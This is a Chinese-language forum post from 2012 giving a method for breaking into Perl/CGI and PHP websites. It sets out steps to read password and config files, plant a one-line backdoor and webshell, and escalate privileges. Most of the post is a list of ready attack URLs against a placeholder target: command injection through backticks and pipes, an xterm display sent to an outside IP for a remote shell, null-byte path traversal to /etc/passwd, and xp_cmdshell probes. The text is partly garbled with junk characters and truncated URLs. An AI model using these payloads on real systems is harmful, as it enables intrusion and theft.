总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着
) D2 F( I" s3 z3 O: S3 e* F0 Q3 Gcookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
1 Y& \% c6 _; P9 |7 t感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们
% M0 u8 e8 z! M; a W注“ , A) A6 @* c$ H) u" K, a
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。 6 ^$ @' T% c. {4 A( E; P# `
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET
1 b% k; y- }: y, t9 K- l: H0 a9 n) N( U8 `
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造 * i# A- T/ q. \- y+ m
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢 ' y6 M/ j6 ~' q$ a
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号 : X& K! {' d$ F' Q
http://target.com/cgi-bin/home/news/sub.pl?`id` * j* e% G' W d2 r2 E& ~# y5 h
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`
0 a+ H& L' A9 R6 qhttp://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示 : P% s' ^0 e- p
, b4 c1 d6 T. z; ^2 c
http://target.com/test.pl;ls|
! ~6 }5 V- B% s8 g* c2 ohttp://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
; f$ k/ `2 D- P4 e T, c) |7 |http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26| 2 h/ j6 V2 h: q% U/ _- v2 U
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造 0 I# C5 T: w) h9 t
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。
" r/ S5 C0 V2 I+ s1 [& Lhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection ! b6 Y- j! v9 B0 A) z3 V
. ~: F% O0 _8 t# q2 R$ b8 L
http://target.com/test.pl?&........ /../../etc/passwd : N' ~0 r. U" r: f6 U! v' c
3 K8 A k0 ?- c1 H
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./ + K9 {, `* H4 L; _8 V0 [$ [& Q' @
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了 4 d: j7 \, \' s" n- y( N! J0 }
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00 + Z+ X# x. P+ D2 Y/ Y; {( b
5 b% ~, q5 b, v# y- o8 A6 Phttp://www.target.org/show.php?f ... /include/config.php 查看php代码 + I3 F. g) X4 k, ~) b
http://www.target.org/show.php?f ... ng/admin/global.php
3 H% l, W7 a9 I
! b1 O" g8 H% O6 r; ~) Vemm和ps的一句话* S* h) @1 o2 M2 l0 J. n& e
. @+ S; v% M4 h' y2 r* n7 J+ W% `- G
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20 ) A. _9 N2 f( G2 N. z5 ^& t
$ L- R5 h1 E N) a>bbb%20|
2 }5 |9 N& ~* o8 {& n# L# h/ b9 n$ e, e5 N
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串
' k( T5 x2 x: V/ x: H; r7 d/ n' A, @9 ` R$ H9 i! A7 i2 g& @
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征 4 R Y; ^6 G' h$ j5 A* j$ w5 Y
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin
- K; t y* P, k: U* e' [4 n2 ~- z6 F' M
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法
+ F& h7 u s4 ^# G0 Khttp://target.com/index.html#cmd.exe ) k: d. j0 @ ~3 b
http://target.com/index.html?dummyparam=xp_cmdshell * s8 R( j4 u# u( ~& ?4 u; Q" b) D0 u R
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd
0 I4 a2 o# _1 A3 x; J0 W* h |
发表于 2012-9-13 16:56:16
收藏
分享
支持
反对